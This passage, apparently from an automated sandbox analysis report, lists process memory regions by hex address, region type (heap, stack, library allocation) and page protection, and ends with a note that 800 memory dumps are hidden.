page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
1F38F0B5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E7D83C5000
|
trusted library allocation
|
page read and write
|
||
|
BE3F3FE000
|
stack
|
page read and write
|
||
|
25EDB227000
|
heap
|
page read and write
|
||
|
25EDD110000
|
heap
|
page read and write
|
||
|
1D1B085D000
|
heap
|
page read and write
|
||
|
1D1B07F1000
|
heap
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
8AA7C7E000
|
stack
|
page read and write
|
||
|
26AC66D0000
|
heap
|
page read and write
|
||
|
1D1B0832000
|
heap
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
17397EE5000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1E7F07D3000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
25EDB23D000
|
heap
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
25EDB298000
|
heap
|
page read and write
|
||
|
20411756000
|
heap
|
page read and write
|
||
|
1652FFB000
|
stack
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
25EDB298000
|
heap
|
page read and write
|
||
|
26AAE0D3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA62000
|
trusted library allocation
|
page read and write
|
||
|
970B939000
|
stack
|
page read and write
|
||
|
25EDCDC0000
|
heap
|
page read and write
|
||
|
1F38CDD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8AA803E000
|
stack
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
173B1E8B000
|
heap
|
page read and write
|
||
|
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
|
17399B70000
|
heap
|
page read and write
|
||
|
1E7F06E0000
|
heap
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
1F38CBB0000
|
heap
|
page read and write
|
||
|
173B1DBF000
|
heap
|
page read and write
|
||
|
1E7F05F1000
|
heap
|
page read and write
|
||
|
1E7D8351000
|
trusted library allocation
|
page read and write
|
||
|
173B1F17000
|
heap
|
page execute and read and write
|
||
|
26AAC870000
|
trusted library allocation
|
page read and write
|
||
|
25EDB231000
|
heap
|
page read and write
|
||
|
26AAC7D0000
|
heap
|
page read and write
|
||
|
8AA7F3D000
|
stack
|
page read and write
|
||
|
2446B8C0000
|
heap
|
page read and write
|
||
|
1E7F07C9000
|
heap
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
1739B8F2000
|
trusted library allocation
|
page read and write
|
||
|
25EDB24C000
|
heap
|
page read and write
|
||
|
1739B37F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D1B3F60000
|
heap
|
page read and write
|
||
|
8AA7BFE000
|
stack
|
page read and write
|
||
|
4CF59FE000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
|
1F38CEF0000
|
heap
|
page read and write
|
||
|
173997E0000
|
heap
|
page read and write
|
||
|
15C6CB88000
|
heap
|
page read and write
|
||
|
1E7F05F3000
|
heap
|
page read and write
|
||
|
173B2087000
|
heap
|
page read and write
|
||
|
60886FE000
|
stack
|
page read and write
|
||
|
25EDB279000
|
heap
|
page read and write
|
||
|
1E7F07E6000
|
heap
|
page read and write
|
||
|
970B5FE000
|
stack
|
page read and write
|
||
|
26AAFB54000
|
trusted library allocation
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
25EDD119000
|
heap
|
page read and write
|
||
|
1739B2D3000
|
trusted library allocation
|
page read and write
|
||
|
1E7D9F70000
|
trusted library allocation
|
page read and write
|
||
|
8AA7DBE000
|
stack
|
page read and write
|
||
|
1E7D9EAA000
|
trusted library allocation
|
page read and write
|
||
|
10C84FE000
|
stack
|
page read and write
|
||
|
C3074F9000
|
stack
|
page read and write
|
||
|
26AC67C6000
|
heap
|
page execute and read and write
|
||
|
1F38EBEF000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
25EDB2C6000
|
heap
|
page read and write
|
||
|
970B67E000
|
stack
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D1B082A000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
26AC6909000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
26AAFB88000
|
trusted library allocation
|
page read and write
|
||
|
2254E4D0000
|
heap
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
4CF5AFF000
|
stack
|
page read and write
|
||
|
173B2070000
|
heap
|
page read and write
|
||
|
1F38F1A2000
|
trusted library allocation
|
page read and write
|
||
|
26AAE5D4000
|
trusted library allocation
|
page read and write
|
||
|
1739B2F4000
|
trusted library allocation
|
page read and write
|
||
|
1F38CBE0000
|
trusted library section
|
page read and write
|
||
|
25EDB291000
|
heap
|
page read and write
|
||
|
1E7D649A000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
25EDB291000
|
heap
|
page read and write
|
||
|
2254E7CD000
|
heap
|
page read and write
|
||
|
1E7F0355000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
25EDB25E000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
25EDB291000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
26AC671A000
|
heap
|
page read and write
|
||
|
17397EE0000
|
heap
|
page read and write
|
||
|
1D1B082A000
|
heap
|
page read and write
|
||
|
165408E000
|
stack
|
page read and write
|
||
|
1739B31C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
60885FF000
|
stack
|
page read and write
|
||
|
16533B7000
|
stack
|
page read and write
|
||
|
26AAE561000
|
trusted library allocation
|
page read and write
|
||
|
970B57D000
|
stack
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
1E7D9694000
|
trusted library allocation
|
page read and write
|
||
|
17912110000
|
heap
|
page read and write
|
||
|
1F39ED68000
|
trusted library allocation
|
page read and write
|
||
|
BE3EDFE000
|
stack
|
page read and write
|
||
|
1E7E83BB000
|
trusted library allocation
|
page read and write
|
||
|
1E7D645C000
|
heap
|
page read and write
|
||
|
17912310000
|
heap
|
page read and write
|
||
|
25EDB24C000
|
heap
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
1D1B07F8000
|
heap
|
page read and write
|
||
|
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0856000
|
heap
|
page read and write
|
||
|
2254E586000
|
heap
|
page read and write
|
||
|
25EDB2AB000
|
heap
|
page read and write
|
||
|
1E7D7E80000
|
heap
|
page readonly
|
||
|
26AAC71A000
|
heap
|
page read and write
|
||
|
1D1B07ED000
|
heap
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
1E7D8F7D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA11000
|
trusted library allocation
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
26AC67C0000
|
heap
|
page execute and read and write
|
||
|
4790EFE000
|
stack
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
2254E5B4000
|
heap
|
page read and write
|
||
|
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
|
17399D0B000
|
trusted library allocation
|
page read and write
|
||
|
1E7D66C0000
|
heap
|
page read and write
|
||
|
17397E30000
|
heap
|
page read and write
|
||
|
26AB0187000
|
trusted library allocation
|
page read and write
|
||
|
1F38CBD5000
|
heap
|
page read and write
|
||
|
16535BF000
|
stack
|
page read and write
|
||
|
1652B45000
|
stack
|
page read and write
|
||
|
17912264000
|
heap
|
page read and write
|
||
|
1F38EB30000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
26ABE561000
|
trusted library allocation
|
page read and write
|
||
|
8AA8C4E000
|
stack
|
page read and write
|
||
|
1F38ED21000
|
trusted library allocation
|
page read and write
|
||
|
970B47E000
|
stack
|
page read and write
|
||
|
26AAFB6B000
|
trusted library allocation
|
page read and write
|
||
|
204119D0000
|
heap
|
page read and write
|
||
|
1F38CBD0000
|
heap
|
page read and write
|
||
|
165317D000
|
stack
|
page read and write
|
||
|
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
|
970B7BF000
|
stack
|
page read and write
|
||
|
1E7D94AB000
|
trusted library allocation
|
page read and write
|
||
|
26ABE5DF000
|
trusted library allocation
|
page read and write
|
||
|
1E7F081A000
|
heap
|
page read and write
|
||
|
1E7F05FA000
|
heap
|
page read and write
|
||
|
1E7D6600000
|
heap
|
page read and write
|
||
|
165353E000
|
stack
|
page read and write
|
||
|
1E7D644D000
|
heap
|
page read and write
|
||
|
4CF5119000
|
stack
|
page read and write
|
||
|
1D1B2500000
|
heap
|
page read and write
|
||
|
1739B383000
|
trusted library allocation
|
page read and write
|
||
|
8AA8DCC000
|
stack
|
page read and write
|
||
|
1E7D9F74000
|
trusted library allocation
|
page read and write
|
||
|
25EDB2A2000
|
heap
|
page read and write
|
||
|
1F38ED01000
|
trusted library allocation
|
page read and write
|
||
|
1E7F0645000
|
heap
|
page read and write
|
||
|
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
|
8AA7A7F000
|
stack
|
page read and write
|
||
|
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
|
28CC20F0000
|
heap
|
page read and write
|
||
|
25EDB291000
|
heap
|
page read and write
|
||
|
8AA8C0D000
|
stack
|
page read and write
|
||
|
17399BC0000
|
trusted library allocation
|
page read and write
|
||
|
1F38ED47000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
26AC6BB0000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
60880FE000
|
stack
|
page read and write
|
||
|
1F38ED11000
|
trusted library allocation
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
25EDB24C000
|
heap
|
page read and write
|
||
|
8AA813C000
|
stack
|
page read and write
|
||
|
C30844E000
|
stack
|
page read and write
|
||
|
1D1B0851000
|
heap
|
page read and write
|
||
|
FF20C79000
|
stack
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E7F07E2000
|
heap
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
1D1B082A000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
17397E60000
|
heap
|
page read and write
|
||
|
165400F000
|
stack
|
page read and write
|
||
|
1791241C000
|
heap
|
page read and write
|
||
|
1E7F04F0000
|
heap
|
page read and write
|
||
|
173B1DB6000
|
heap
|
page read and write
|
||
|
17399725000
|
heap
|
page read and write
|
||
|
1653339000
|
stack
|
page read and write
|
||
|
26AAC7A0000
|
heap
|
page read and write
|
||
|
173B1DD3000
|
heap
|
page read and write
|
||
|
1E7D8005000
|
heap
|
page read and write
|
||
|
26AAC7F0000
|
heap
|
page read and write
|
||
|
1739B829000
|
trusted library allocation
|
page read and write
|
||
|
1E7D857D000
|
trusted library allocation
|
page read and write
|
||
|
1E7D66A0000
|
trusted library allocation
|
page read and write
|
||
|
8AA80BB000
|
stack
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
17397D10000
|
heap
|
page read and write
|
||
|
BE3E969000
|
stack
|
page read and write
|
||
|
1652BCE000
|
stack
|
page read and write
|
||
|
1F38CEF5000
|
heap
|
page read and write
|
||
|
28CC1FF8000
|
heap
|
page read and write
|
||
|
1739AA78000
|
trusted library allocation
|
page read and write
|
||
|
1E7D6418000
|
heap
|
page read and write
|
||
|
26AAFB3A000
|
trusted library allocation
|
page read and write
|
||
|
173B208D000
|
heap
|
page read and write
|
||
|
D911D8E000
|
unkown
|
page read and write
|
||
|
10C8BFE000
|
stack
|
page read and write
|
||
|
26AC6697000
|
heap
|
page read and write
|
||
|
1E7D9BCF000
|
trusted library allocation
|
page read and write
|
||
|
1E7F07D8000
|
heap
|
page read and write
|
||
|
1F38F0AA000
|
trusted library allocation
|
page read and write
|
||
|
10C8AFF000
|
stack
|
page read and write
|
||
|
1F38CC8A000
|
heap
|
page read and write
|
||
|
970B9BE000
|
stack
|
page read and write
|
||
|
2254E579000
|
heap
|
page read and write
|
||
|
26AC66E4000
|
heap
|
page read and write
|
||
|
20411900000
|
heap
|
page read and write
|
||
|
1E7D7F10000
|
heap
|
page read and write
|
||
|
26AC66E6000
|
heap
|
page read and write
|
||
|
26AC67D0000
|
heap
|
page read and write
|
||
|
2254E586000
|
heap
|
page read and write
|
||
|
C3076BE000
|
stack
|
page read and write
|
||
|
26AAE0D0000
|
trusted library allocation
|
page read and write
|
||
|
1739A078000
|
trusted library allocation
|
page read and write
|
||
|
1E7F07C7000
|
heap
|
page read and write
|
||
|
25EDB291000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1E7D7EE0000
|
heap
|
page execute and read and write
|
||
|
25EDB27A000
|
heap
|
page read and write
|
||
|
1F38EDF8000
|
trusted library allocation
|
page read and write
|
||
|
26AAFB72000
|
trusted library allocation
|
page read and write
|
||
|
17397DCD000
|
heap
|
page read and write
|
||
|
17399EB2000
|
trusted library allocation
|
page read and write
|
||
|
1E7D7F50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
C306FDF000
|
stack
|
page read and write
|
||
|
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
|
20411796000
|
heap
|
page read and write
|
||
|
1E7D995C000
|
trusted library allocation
|
page read and write
|
||
|
1E7D7F53000
|
trusted library allocation
|
page read and write
|
||
|
25EDB29D000
|
heap
|
page read and write
|
||
|
4CF55FE000
|
stack
|
page read and write
|
||
|
1E7D9BF0000
|
trusted library allocation
|
page read and write
|
||
|
2254E5AB000
|
heap
|
page read and write
|
||
|
C30838D000
|
stack
|
page read and write
|
||
|
173B1DDB000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1F38EB10000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1D1B082E000
|
heap
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
4790AFE000
|
stack
|
page read and write
|
||
|
25EDB298000
|
heap
|
page read and write
|
||
|
2446B960000
|
heap
|
page read and write
|
||
|
225502B0000
|
heap
|
page read and write
|
||
|
2254E5CB000
|
heap
|
page read and write
|
||
|
F9CEBB000
|
stack
|
page read and write
|
||
|
2254E558000
|
heap
|
page read and write
|
||
|
204119D5000
|
heap
|
page read and write
|
||
|
C3075BC000
|
stack
|
page read and write
|
||
|
2254E5AF000
|
heap
|
page read and write
|
||
|
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
26AAC890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
1739B2F0000
|
trusted library allocation
|
page read and write
|
||
|
26AC67F0000
|
heap
|
page read and write
|
||
|
C307638000
|
stack
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
1F38CC4E000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D1B085C000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
47907AA000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
26AAC72E000
|
heap
|
page read and write
|
||
|
25EDB420000
|
heap
|
page read and write
|
||
|
2254E5E2000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
FF20D7F000
|
stack
|
page read and write
|
||
|
2254E578000
|
heap
|
page read and write
|
||
|
7FFD9BA3C000
|
trusted library allocation
|
page read and write
|
||
|
2446B940000
|
heap
|
page read and write
|
||
|
17397DB5000
|
heap
|
page read and write
|
||
|
2254E7C0000
|
heap
|
page read and write
|
||
|
165363B000
|
stack
|
page read and write
|
||
|
1F38EBE2000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
4790DFF000
|
stack
|
page read and write
|
||
|
1D1B07F1000
|
heap
|
page read and write
|
||
|
1F38ED5C000
|
trusted library allocation
|
page read and write
|
||
|
204117C0000
|
heap
|
page read and write
|
||
|
C30727E000
|
stack
|
page read and write
|
||
|
26AAFB67000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
26AC6714000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
20411920000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1652F7E000
|
stack
|
page read and write
|
||
|
2254E574000
|
heap
|
page read and write
|
||
|
1E7D9928000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
|
1E7D6450000
|
heap
|
page read and write
|
||
|
25EDB25D000
|
heap
|
page read and write
|
||
|
10C87FF000
|
stack
|
page read and write
|
||
|
1E7D66C5000
|
heap
|
page read and write
|
||
|
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
|
25EDB280000
|
heap
|
page read and write
|
||
|
1F38EDED000
|
trusted library allocation
|
page read and write
|
||
|
25EDB256000
|
heap
|
page read and write
|
||
|
1739B33C000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0A10000
|
heap
|
page read and write
|
||
|
173B1E73000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0860000
|
heap
|
page read and write
|
||
|
173A9E36000
|
trusted library allocation
|
page read and write
|
||
|
1F38ECC0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
179122D9000
|
heap
|
page read and write
|
||
|
10C85FE000
|
stack
|
page read and write
|
||
|
26AAC8F0000
|
heap
|
page read and write
|
||
|
173A9CF3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0830000
|
heap
|
page read and write
|
||
|
2446B8A0000
|
heap
|
page read and write
|
||
|
970C4C8000
|
stack
|
page read and write
|
||
|
C30828E000
|
stack
|
page read and write
|
||
|
25EDB298000
|
heap
|
page read and write
|
||
|
970B1DE000
|
stack
|
page read and write
|
||
|
1F3A6E20000
|
trusted library allocation
|
page read and write
|
||
|
1E7D9958000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
15C6CF05000
|
heap
|
page read and write
|
||
|
1E7E8351000
|
trusted library allocation
|
page read and write
|
||
|
26AC6670000
|
heap
|
page read and write
|
||
|
25EDB220000
|
heap
|
page read and write
|
||
|
C3073FE000
|
stack
|
page read and write
|
||
|
17399B30000
|
trusted library allocation
|
page read and write
|
||
|
25EDB2A1000
|
heap
|
page read and write
|
||
|
173B20EC000
|
heap
|
page read and write
|
||
|
17912415000
|
heap
|
page read and write
|
||
|
1739B2E6000
|
trusted library allocation
|
page read and write
|
||
|
173B1F90000
|
heap
|
page read and write
|
||
|
1D1B087B000
|
heap
|
page read and write
|
||
|
FF20CFF000
|
unkown
|
page read and write
|
||
|
47911FE000
|
stack
|
page read and write
|
||
|
16530FF000
|
stack
|
page read and write
|
||
|
28CC1F00000
|
heap
|
page read and write
|
||
|
17399B80000
|
heap
|
page readonly
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
C30783B000
|
stack
|
page read and write
|
||
|
1D1B0833000
|
heap
|
page read and write
|
||
|
1F38CC00000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
C30737F000
|
stack
|
page read and write
|
||
|
17397D8E000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0856000
|
heap
|
page read and write
|
||
|
25EDB2B5000
|
heap
|
page read and write
|
||
|
BE3F1FF000
|
stack
|
page read and write
|
||
|
26AC68D0000
|
heap
|
page read and write
|
||
|
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
|
2254E5FA000
|
heap
|
page read and write
|
||
|
1F39ED01000
|
trusted library allocation
|
page read and write
|
||
|
1E7D992C000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0833000
|
heap
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
173A9C81000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6087D6A000
|
stack
|
page read and write
|
||
|
1F38EE3B000
|
trusted library allocation
|
page read and write
|
||
|
26AC6780000
|
heap
|
page execute and read and write
|
||
|
1F3A6E00000
|
heap
|
page execute and read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
26AAC8A0000
|
heap
|
page readonly
|
||
|
1F38ED49000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
25EDB298000
|
heap
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
1E7F064F000
|
heap
|
page read and write
|
||
|
1D1B0833000
|
heap
|
page read and write
|
||
|
1E7F04D0000
|
heap
|
page execute and read and write
|
||
|
1E7D8000000
|
heap
|
page read and write
|
||
|
1E7D6410000
|
heap
|
page read and write
|
||
|
26AC694D000
|
heap
|
page read and write
|
||
|
1E7D9998000
|
trusted library allocation
|
page read and write
|
||
|
60881FE000
|
stack
|
page read and write
|
||
|
2446B968000
|
heap
|
page read and write
|
||
|
204119DE000
|
heap
|
page read and write
|
||
|
1E7F05C0000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
|
25EDB3F0000
|
heap
|
page read and write
|
||
|
C3077BE000
|
stack
|
page read and write
|
||
|
1F38ECC6000
|
heap
|
page execute and read and write
|
||
|
173A9C90000
|
trusted library allocation
|
page read and write
|
||
|
26ABE5D3000
|
trusted library allocation
|
page read and write
|
||
|
8AA77EE000
|
stack
|
page read and write
|
||
|
2254E550000
|
heap
|
page read and write
|
||
|
26AAE1F0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
1D1B07A0000
|
heap
|
page read and write
|
||
|
C30773F000
|
stack
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
1D1B0740000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1F3A7020000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
26AAFBA6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
1F38ED83000
|
trusted library allocation
|
page read and write
|
||
|
165343E000
|
stack
|
page read and write
|
||
|
1F38EB85000
|
heap
|
page read and write
|
||
|
970BB3B000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
165323E000
|
stack
|
page read and write
|
||
|
25EDB2C6000
|
heap
|
page read and write
|
||
|
25EDB27E000
|
heap
|
page read and write
|
||
|
26AAFDE2000
|
trusted library allocation
|
page read and write
|
||
|
26AC6920000
|
heap
|
page read and write
|
||
|
25EDB425000
|
heap
|
page read and write
|
||
|
2254E5B5000
|
heap
|
page read and write
|
||
|
1D1B0660000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
173B1F10000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
26AC6955000
|
heap
|
page read and write
|
||
|
26AAE78B000
|
trusted library allocation
|
page read and write
|
There are 800 hidden memdumps, click here to show them.